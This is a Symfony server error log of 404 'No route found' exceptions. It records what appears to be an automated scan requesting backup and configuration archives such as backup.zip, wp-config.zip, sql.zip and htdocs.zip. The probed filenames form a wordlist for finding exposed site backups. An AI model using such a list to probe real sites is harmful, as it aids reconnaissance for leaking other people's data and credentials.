[2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ftp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ftp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webmin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webmin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /back_up.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /back_up.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /rpc.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /rpc.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /test.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /test.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backups.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backups.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_weekly.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_weekly.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sqllite.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sqllite.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-config.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-config.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /images.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /images.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /output.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /output.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /directadmin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /directadmin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /postgres.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /postgres.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-20240527.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-20240527.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /bazaar.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /bazaar.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /protected.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /protected.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /duplicate.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /duplicate.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /services.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /services.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dbase.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dbase.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /linode.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /linode.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /graphql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /graphql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /client.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /client.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /elasticsearch.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /elasticsearch.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /repo.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /repo.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /control_panel.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /control_panel.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /downloads.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /downloads.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /yarn.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /yarn.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sandbox.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sandbox.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /toml.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /toml.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /npm.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /npm.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-2024.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-2024.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /godaddy.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /godaddy.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configuration.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configuration.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /htdocs.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /htdocs.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /bluehost.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /bluehost.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /videos.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /videos.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-complete.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-complete.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /options.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /options.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /siteground.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /siteground.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-full.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-full.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
